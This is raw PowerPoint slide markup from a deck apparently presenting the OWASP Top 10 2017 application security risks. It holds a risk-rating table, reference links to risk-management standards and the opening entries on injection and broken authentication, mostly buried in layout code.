      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2819402" y="7543798"/>
            <a:ext cx="609600" cy="4"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="4A1647"/>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24200" y="6934200"/>
            <a:ext cx="533400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 230"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="4A1647"/>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67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3576608917"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="38739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r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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492909">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> may </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="6172200" cy="2105025"/>
            <a:chOff x="304800" y="2085975"/>
            <a:chExt cx="6172200" cy="2105025"/>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6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505075"/>
              <a:ext cx="139700" cy="304800"/>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17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2085975"/>
              <a:ext cx="516488"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Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924175"/>
              <a:ext cx="139700" cy="304800"/>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41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1354769" y="2085975"/>
              <a:ext cx="550151"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Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727423" y="2085975"/>
              <a:ext cx="777777"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Weaknesses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4621087" y="2085975"/>
              <a:ext cx="63671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Technical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5809634" y="2085975"/>
              <a:ext cx="599843" cy="30232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Business</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>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cs typeface="+mn-cs"/>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59399" y="2090853"/>
              <a:ext cx="590226"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rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Controls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2606391268"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="4190421"/>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46793">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0"/>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t> Risk?</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6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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.  </a:t>
                      </a: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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>In this edition, we have changed the risk rating system around compared to previous version to assist with our ranking of likelihoods and impacts. This is not an issue within the document, but is clear in the public data analysis. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a CMS for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts are very different for the same exact software. It is critical that you apply your custom threat agents and business impacts based upon the data asset criticality.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" u="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Where possible, the names of the risks in the Top 10 are aligned with CWE weaknesses to promote generally accepted security practices and to reduce confusion. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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2044036359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="6111240"/>
          <a:ext cx="4191001" cy="1051560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="620889">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="672392">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="685802">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Threat</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agents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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRP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Prevalence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Weakness Detectability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Technical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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Business Impacts</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algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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Widespread</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Easy</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Severe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0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tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> / Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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Average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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Moderate</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B200"/>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Uncommon</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Difficult</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Minor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" anchor="ct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solidFill>
                      <a:srgbClr val="FFFF00"/>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1417672387"/>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47882">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>References</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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4311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700" kern="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kern="1200" baseline="0" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId6"/>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5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng"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pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Std</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId8"/>
                      </a:endParaRP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9"/>
                        </a:rPr>
                        <a:t>ISO 27001: ISMS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0"/>
                        </a:rPr>
                        <a:t>NIST Cyber Framework</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (US)</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1"/>
                        </a:rPr>
                        <a:t>ASD Strategic Mitigations (AU)</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2"/>
                        </a:rPr>
                        <a:t>NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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8" name="Textplatzhalter 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>OWASP Top 10 2017</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41713193-AF8E-47ED-A0B1-8F6073105D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-685800" y="914400"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5308A3-3666-418A-9AE6-240E4688F2BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-6096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564637" y="107178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Injection flaws, such as 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151386" y="99531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A1:2017 Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1874768"/>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151386" y="179829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A2:2017 Broken Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 10">
